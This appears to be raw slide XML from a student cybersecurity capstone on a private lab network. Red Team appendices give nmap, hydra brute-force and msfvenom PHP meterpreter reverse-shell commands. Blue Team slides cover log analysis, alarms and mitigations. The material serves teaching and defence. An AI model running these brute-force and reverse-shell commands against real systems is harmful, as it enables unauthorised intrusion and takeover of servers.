                </a:solidFill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From the ‘Top 10 HTTP requests’ report, we can see that the ‘/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company_folders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’ directory had a high request count.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
            </a:b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1354" name="Google Shape;1354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355" name="Google Shape;1355;p36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="437192" y="1426793"/>
            <a:ext cx="8409300" cy="274606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56" name="Google Shape;135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343" y="1524553"/>
            <a:ext cx="4710998" cy="2550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Analysis: Identifying Request for Hidden Directory (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>con’t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill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request for the ‘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’ directory started on May 6, 2021 @ 02:31.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1362" name="Google Shape;1362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363" name="Google Shape;1363;p37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="443550" y="1239937"/>
            <a:ext cx="8409300" cy="238410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4" name="Google Shape;136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253" y="1812178"/>
            <a:ext cx="8351893" cy="1204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Analysis: Identifying Brute Force Attack</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill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Search results for the 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connect_to_corp_server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’ file in the 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‘/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company_folders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’ directory, indicates the file was successfully accessed 2 times.</a:t>
            </a:r>
            <a:endParaRPr sz="1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6" name="Google Shape;1386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387" name="Google Shape;1387;p40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457795" y="1422133"/>
            <a:ext cx="8409300" cy="2947615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88" name="Google Shape;1388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2317" y="1611733"/>
            <a:ext cx="7518252" cy="2561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1025" name="Google Shape;1025;p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027" name="Google Shape;1027;p2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1352550" y="1269771"/>
            <a:ext cx="7517100" cy="504515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8" name="Google Shape;1028;p2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="1269759"/>
            <a:ext cx="776889" cy="504515"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1029" name="Google Shape;1029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 dirty="0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 dirty="0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1" name="Google Shape;1031;p2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="1999887"/>
            <a:ext cx="776889" cy="532410"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1032" name="Google Shape;1032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4" name="Google Shape;1034;p2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="2730109"/>
            <a:ext cx="776889" cy="568628"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1035" name="Google Shape;1035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7" name="Google Shape;1037;p2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="3528409"/>
            <a:ext cx="776889" cy="524404"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1038" name="Google Shape;1038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0" name="Google Shape;1040;p2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1236739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2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1352550" y="2002298"/>
            <a:ext cx="7517100" cy="53241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2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1352550" y="2770049"/>
            <a:ext cx="7517100" cy="528688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2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1352550" y="3523634"/>
            <a:ext cx="7517100" cy="524404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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-31968" y="1960721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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-31968" y="272872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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-31968" y="3504182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9" name="Google Shape;1037;p2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AE56AC5-D9D6-46B6-A221-5FAD79081BEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="4320541"/>
            <a:ext cx="776889" cy="524404"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="Google Shape;1038;p2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19D071CC-1DED-4824-A6A2-ADF58C56A02D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr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" name="Google Shape;1039;p2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A8EBAFF-BEDA-42C2-9A25-E7BB7E8B857B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr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" name="Google Shape;1043;p2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E2D6F3A-9F61-4AA5-A35C-E33BEB0EFC7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1304783" y="4295467"/>
            <a:ext cx="7517100" cy="524404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sym typeface="Arial"/>
              </a:rPr>
              <a:t>Appendix</a:t>
            </a:r>
            <a:endParaRPr sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none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sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="41" name="Google Shape;1037;p2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18B3DF47-A41B-4B64-BF5C-61DBD431BDAE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="4314907"/>
            <a:ext cx="776889" cy="524404"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="42" name="Google Shape;1038;p2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{255FEF0B-49F1-4301-8159-AE63FDCC5B1C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr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0" i="0" u="none" strike="noStrike" cap="none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3" name="Google Shape;1039;p2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DE9760C-ECB4-4A74-AA10-DF620AE031F1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr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" name="Google Shape;1043;p2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4C0FDE6-8894-4D90-BCF8-84692B841452}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1304783" y="4289833"/>
            <a:ext cx="7517100" cy="524404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sym typeface="Arial"/>
              </a:rPr>
              <a:t>Appendix</a:t>
            </a:r>
            <a:endParaRPr sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none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Analysis: Identifying Brute Force Attack (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>con’t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill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log from May 6, 2021 indicates that the ‘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connect_to_corp_server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’ file was accessed using the username ‘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ashton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’.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1394" name="Google Shape;1394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395" name="Google Shape;1395;p41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="1379700"/>
            <a:ext cx="8409300" cy="238410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96" name="Google Shape;139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2990" y="1611090"/>
            <a:ext cx="6418020" cy="1921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Analysis: Finding WebDAV Connection</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill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From the ‘Top 10 HTTP requests’ report, we can see the ‘http://192.168.1.105/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webdav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’ directory was requested 60 times.</a:t>
            </a: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-  Within this directory, we were able to view and access the ‘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shell.php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’ file. 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1402" name="Google Shape;1402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403" name="Google Shape;1403;p42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="450445" y="1377768"/>
            <a:ext cx="8409300" cy="251840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04" name="Google Shape;140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2242" y="1554182"/>
            <a:ext cx="4584300" cy="213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Analysis: Finding WebDAV Connection (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>con’t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill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By searching for the /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webdav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shell.php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’ file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the search result shows the file was successfully accessed 20 times.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1418" name="Google Shape;1418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419" name="Google Shape;1419;p44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="451170" y="1420181"/>
            <a:ext cx="8509950" cy="308896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0" name="Google Shape;142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7019" y="1630411"/>
            <a:ext cx="7518252" cy="266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Analysis: Finding WebDAV Connection (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>con’t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill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log from May 6, 2021 indicates that the ‘/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webdav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shell.php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’ file was accessed using the username ‘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ryan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’.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1426" name="Google Shape;1426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427" name="Google Shape;1427;p45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="462766" y="1439480"/>
            <a:ext cx="8509950" cy="2728365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8" name="Google Shape;1428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0039" y="1636748"/>
            <a:ext cx="4915326" cy="2333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9" name="Google Shape;1449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450" name="Google Shape;1450;p48"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr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b="1"/>
              <a:t>Blue Team</a:t>
            </a:r>
            <a:endParaRPr b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-US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51" name="Google Shape;1451;p4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Mitigation: Blocking IP Traffic</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1457" name="Google Shape;1457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458" name="Google Shape;1458;p49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Set an alarm to detect a port scan from a specific IP address (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>ie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> 192.168.1.8) with a threshold of maybe 25 scans per minute or 150 ping requests per minute.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dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1459" name="Google Shape;1459;p49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Disable ports that don't need to be accessed from outside the organization.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Install a firewall and an intrusion detection system.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Perform routine port scans on your network.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Mitigation: Identifying Request for Hidden Directory</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1465" name="Google Shape;1465;p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466" name="Google Shape;1466;p50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Set an alarm to detect unauthorized access to directories/files (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>ie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>. ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>secret_folder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>’) if an IP address is not on the “allow” list.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Set an alarm if a specific directory/file (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>ie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>secret_folder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>”) is accessed other than a specific user such as the system administrator.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 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 dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1467" name="Google Shape;1467;p50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Restrict access to specific files by using an “allow” list.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Disable the directory listing on the Apache web server.  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Encrypt sensitive files.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 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Mitigation: Preventing Brute Force Attacks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1473" name="Google Shape;1473;p5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474" name="Google Shape;1474;p51"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="154009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Set an alarm to detect brute force attacks  if there is excessive warnings of unsuccessful login attempts with a threshold of maybe 50,000 attempts per second.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Set an alarm if a specific IP address (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>ie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> 192.168.1.8) is attempting to login with a threshold of maybe again 50,000 attempts per second.  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</p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1475" name="Google Shape;1475;p51"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4475414" y="1540090"/>
            <a:ext cx="4298400" cy="3341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Password policy enforced. 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Enable multi-factor authentication.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Restrict the number of login attempts.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Enable CAPTCHA (Completely Automated Public Turing test to tell Computers and Humans Apart), to determine whether a user's input is coming from a human or a machine/bot.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Mitigation: Detecting WebDAV Connection</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1481" name="Google Shape;1481;p5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482" name="Google Shape;1482;p52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Set an alarm to detect connection to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>WebDav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> server if the connection is not a user or IP address on the “allow” list.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1483" name="Google Shape;1483;p52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</p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1484" name="Google Shape;1484;p52"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4857902" y="1534915"/>
            <a:ext cx="3996538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Restrict or allow specific IP addresses.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Install an intrusion detection system or intrusion prevention system.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Perform regular updates and patches.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Remove unnecessary features of the operating system and accounts that are expired or not used.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Disable services not used.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Mitigation: Identifying Reverse Shell Uploads</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1490" name="Google Shape;1490;p5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491" name="Google Shape;1491;p53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Set an alarm to detect file uploads if an IP address is not on the “allow” list.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Set an alarm if the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>WebDav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> directories that contain executable files are accessed other than a specific user such as the system administrator.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</p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1492" name="Google Shape;1492;p53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Restrict access to executable files by using an “allow” list.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 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Require authentication when files are uploaded.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Restrict executable files from being accessed from the web.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 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Network Topology </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1052" name="Google Shape;1052;p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/>
              <a:t>Appendix </a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1052" name="Google Shape;1052;p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15779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Appendix A1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" i="0" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Access Sensitive Information</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" b="0" i="0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sp>
        <p:nvSpPr>
          <p:cNvPr id="1091" name="Google Shape;1091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092" name="Google Shape;1092;p8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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="717649" y="1487250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used to gain access to the ‘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 nmap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Web browser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hydra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4" name="Google Shape;1094;p8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5" name="Google Shape;1095;p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6" name="Google Shape;1096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7" name="Google Shape;1097;p8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8" name="Google Shape;1098;p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9" name="Google Shape;1099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0" name="Google Shape;1100;p8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8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Able to access the ‘secret_folder’ directory to view the contents file, ‘connect_to_corp_server’, which gave instructions on how to connect to the victim’s machine.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2" name="Google Shape;1102;p8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3" name="Google Shape;1103;p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4" name="Google Shape;1104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5" name="Google Shape;1105;p8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8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 #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nmap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192.168.1.8/24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 Navigate to 192.168.1.105/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company_folders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secret_folder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# hydra –l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ashton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–P /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usr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/share/wordlists/rockyou.txt –s 80 –f -v 192.168.1.105 http-get /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company_folders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secret_folder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Appendix A2: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" i="0" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Access Sensitive Information</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" b="0" i="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Perform a port scan to retrieve host and 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service information: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nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1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 192.168.1.8/24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2400" b="0" i="0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sp>
        <p:nvSpPr>
          <p:cNvPr id="1112" name="Google Shape;1112;p1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pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Google Shape;1114;p10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E855594-9B19-4635-91A8-38E3CCCBFAD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82077" y="773867"/>
            <a:ext cx="3782440" cy="39026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67647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Appendix B: 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Brute Force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ttacks</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400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sp>
        <p:nvSpPr>
          <p:cNvPr id="1144" name="Google Shape;1144;p1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145" name="Google Shape;1145;p14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14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used to brute force account passwords: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hydra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Crack Station website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7" name="Google Shape;1147;p14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48" name="Google Shape;1148;p1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9" name="Google Shape;1149;p1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0" name="Google Shape;1150;p14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51" name="Google Shape;1151;p1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2" name="Google Shape;1152;p1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3" name="Google Shape;1153;p14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p14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Able to gain access to the ‘secret_folder’ and to connect to the victim’s machine after cracking the passwords.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55" name="Google Shape;1155;p14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56" name="Google Shape;1156;p1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7" name="Google Shape;1157;p1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8" name="Google Shape;1158;p14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14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 # hydra –l ashton –P /usr/share/wordlists/rockyou.txt –s 80 –f -v 192.168.1.105 http-get /company_folders/secret_folder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 Crack Station website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Note:  Hash password was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indicated in the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‘connect_to_corp_server’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file.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1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Appendix C1: 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File/Shell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cript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U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ploads</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400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sp>
        <p:nvSpPr>
          <p:cNvPr id="1173" name="Google Shape;1173;p1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174" name="Google Shape;1174;p16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Google Shape;1175;p16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used to upload a PHP reverse shell payload script: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File Manager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msvenom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76" name="Google Shape;1176;p16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77" name="Google Shape;1177;p1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78" name="Google Shape;1178;p1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9" name="Google Shape;1179;p16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80" name="Google Shape;1180;p1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81" name="Google Shape;1181;p1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2" name="Google Shape;1182;p16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3" name="Google Shape;1183;p16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Ability to upload a PHP script to the WebDav server.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84" name="Google Shape;1184;p16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85" name="Google Shape;1185;p1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86" name="Google Shape;1186;p1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7" name="Google Shape;1187;p16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8" name="Google Shape;1188;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6401175" y="1481325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 From file manager,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connect to WebDav server:    dav://192.168.1.105/webdav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Create and upload a PHP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reverse shell payload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script called ‘shell.php’.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Appendix C2: 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File/Shell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cript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U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ploads</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2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Create and upload a reverse shell payload script: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msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1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 –p php/</a:t>
            </a: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meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1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/</a:t>
            </a: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reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1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lhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1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=192.168.1.8 </a:t>
            </a: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lport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1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=4444 &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="14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shell.php</a:t>
            </a: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    -  Using default port 4444.</a:t>
            </a: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4C68E9-96CE-4C5E-9A65-BA36234E9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70" y="1796825"/>
            <a:ext cx="8127435" cy="149746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Appendix D1: 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Reverse Shell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ession</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1216" name="Google Shape;1216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217" name="Google Shape;1217;p20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p20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used to execute a reverse shell session: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msfconsole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-  Web browser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19" name="Google Shape;1219;p20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220" name="Google Shape;122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21" name="Google Shape;1221;p2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2" name="Google Shape;1222;p20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223" name="Google Shape;1223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24" name="Google Shape;1224;p2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5" name="Google Shape;1225;p20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Google Shape;1226;p20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Ability to execute a reverse shell to start a meterpreter session.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27" name="Google Shape;1227;p20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228" name="Google Shape;1228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29" name="Google Shape;1229;p2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0" name="Google Shape;1230;p20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1" name="Google Shape;1231;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6401175" y="1481325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# msfconsole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Navigate to the WebDav website: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192.168.1.105/webdav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21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="6626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Appendix D2: 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Reverse Shell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ession </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2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Exploit used to create a listener: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pic>
        <p:nvPicPr>
          <p:cNvPr id="1239" name="Google Shape;123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970" y="1164935"/>
            <a:ext cx="6336792" cy="2011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468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4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2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400"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1058" name="Google Shape;1058;p4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7052550" y="9668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11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Address Range: 192.168.1.0 /24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Netmask: 255.255.255.0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Gateway: 192.168.1.1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IPv4: 192.168.1.8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OS:  Linux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Hostname: Kali Linux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IPv4: 192.168.1.105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dirty="0"/>
              <a:t>OS:  Linux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Hostname: Capstone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IPv4: 192.168.1.100:5601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OS:  Linux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Hostname: Kibana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/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1059" name="Google Shape;1059;p4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Network Topology</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1060" name="Google Shape;1060;p4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pic>
        <p:nvPicPr>
          <p:cNvPr id="1061" name="Google Shape;106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2203" y="942716"/>
            <a:ext cx="4145944" cy="3808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5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr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/>
              <a:t>Red Team</a:t>
            </a:r>
            <a:endParaRPr b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9" name="Google Shape;1069;p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Recon: Describing the Target</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
